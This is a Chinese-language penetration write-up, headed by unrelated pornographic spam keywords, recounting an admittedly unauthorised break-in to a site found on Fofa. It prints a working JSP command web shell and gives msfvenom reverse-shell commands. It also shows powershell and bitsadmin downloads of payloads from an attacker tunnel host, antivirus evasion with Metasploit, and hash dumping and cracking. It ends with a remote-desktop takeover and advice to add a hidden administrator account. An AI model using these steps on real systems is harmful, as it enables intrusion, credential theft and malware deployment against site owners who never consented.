日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

作者：R3gr3t合天智匯

Fofa上找了個站，未授權，所以下文圖片打碼

漏洞url為：http://ip:port/

1. 弱口令登錄

由于一個后臺弱口令，才有了下面的滲透過程.

試了個弱口令，admin，123456進去了

2. 尋找上傳點

最近對文件上傳漏洞很敏感，因為文件上傳比較方便，可以直接傳彈shell

翻了翻，在后臺菜單發現了一個“附件管理”的功能

選擇添加附件

然后抓包，由于環境是JAVA+Tomcat+iis，看看能不能上傳一個jsp

我首先是上傳了一個執行命令并回顯的

<%
    if ("023".equals(request.getParameter("pwd"))) {
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b)) != -1) {
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

發包

小路徑：
http://ip:port/static/tmp/aca388dd-ddf3-48e0-b96a-642a4086e951.jsp?pwd=023&i=whoami

執行whoami命令，當前用戶是個nt authoritysystem權限，好事，省的一會還得提權

這下知道了對面是個win，執行dir看一下目錄

報錯了，經測試，無法查看目錄，但是可以執行systeminfo

系統是 windows Server 2008 R2 Enterprise，打了208個補丁（還好不用提權）

3. 傳馬

然后我打算搞一個msf的上去

msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

jsp感覺是真的麻煩，只能會連一個cmd，不能回連meterpreter，所以幾乎浪費了一晚上的時候 ):

然后msf配置好，接shell

4. 嘗試cmd->meterpreter

cmd對接下來的滲透不方便，想改為meterpreter

問了隊里的師傅，說search upgrade一下，有把cmd轉換為meterpreter的模塊

應該是那個
post/multi/manage/shell_to_meterpreter模塊沒錯了

坑點1

問題來了，要想使用其他模塊就需要把這個session放到后臺去，平常meterpreter的操作都是background，這個cmd我當時就懵了

無意中發現在cmd里也可以使用meterpreter的部分命令，不得不說msf真是強大

background放到后臺，use
post/multi/manage/shell_to_meterpreter，set SESSION ，然后run

不知道為什么，它就失敗了

坑點2

下一種方法，搞一個
windows/meterpreter/reverse_tcp的上去，拿msf生成了個

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -e x86/shikata_ga_nai -i 10 -f exe > shell.exe

由于cmd可以使用msf的upload命令，直接執行upload shell.exe shell.exe上去

再一次挺突然的，失敗了

遠程下載文件

powershell

平常都是使用powershell的，所以這次也打算拿它下載

本地搭個web服務，然后用NatApp隧道轉發一下，這樣就能方便的下載文件了，還能看有沒有流量過來

然后執行powershell命令，powershell (new-object Net.WebClient).DownloadFile('
http://xxxxxx.natappfree.cc/shell.exe','C:Pathshell.exe')

然后再一次，半天無回顯

bitsadmin

還有bitsadmin的下載方法，win7以上可以使用，但是這個環境也是成功了，感覺比powershell好用

bitsadmin /transfer n http://xxxxxx.natappfree.cc/shell.exe C:Pathshell.exe

5. 惡心的殺軟

當晚大意了，沒注意進程里有沒有殺軟，一直不上線，本地測試也一直不上線，造成了vps出問題的假象

修了一晚上的vps，才發現是我本地殺軟沒關，連不上，對方的機子里有殺軟，也連不上

tasklist看一下，對方的機子里有騰訊安全管家（由于我的智障操作，導致后來遠程桌面連上后，殺軟已經報了好幾個毒，還好沒被發現）

嘗試免殺

免殺還是第一次，所以只會拿工具免殺

先是試了shellter，avet，venom，都沒過（可能是我工具使用姿勢不對）

然后查到了一篇Evasion的免殺，這個免殺是msf的一個模塊，在metasploit5.0加入，不得不說msf真是強大

msf5 > use evasion/windows/windows_defender_exe

msf5 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp

msf5 > set LHOST

msf5 > set LPORT

msf5 > run

然后就會生成一個隨機名字的，為了測試，本地下了一個騰訊安全管家

這次成功的上線了

6. 嘗試抓明文密碼

獼猴桃

用msf自帶的mimikatz抓明文密碼

load mimikatz

kerberos

由于殺軟問題，抓不到明文密碼

msf自帶模塊

又是強大的msf起作用了，
post/windows/gather/smart_hashdump模塊抓明文密碼

Administrator的密碼是第二個哈希值，第一個是空密碼

拿哈希值去cmd5解密，是一條付費的，正好群里有個師傅快到期了，幫解密，成功的拿到明文密碼

7. 遠程連接

當時直接連上了Administrator的賬戶，隊里師傅說會把別人踢下線

正確操作應該是添加個管理員賬號，然后再連

小站無內網，滲透結束

相關實驗：

Metasploit制作木馬后門

https://www.hetianlab.com/expc.do?ec=ECID1932-04d9-4856-88c7-e02fb889edd3

聲明：筆者初衷用于分享與普及網絡知識，若讀者因此作出任何危害網絡安全行為后果自負，與合天智匯及原作者無關！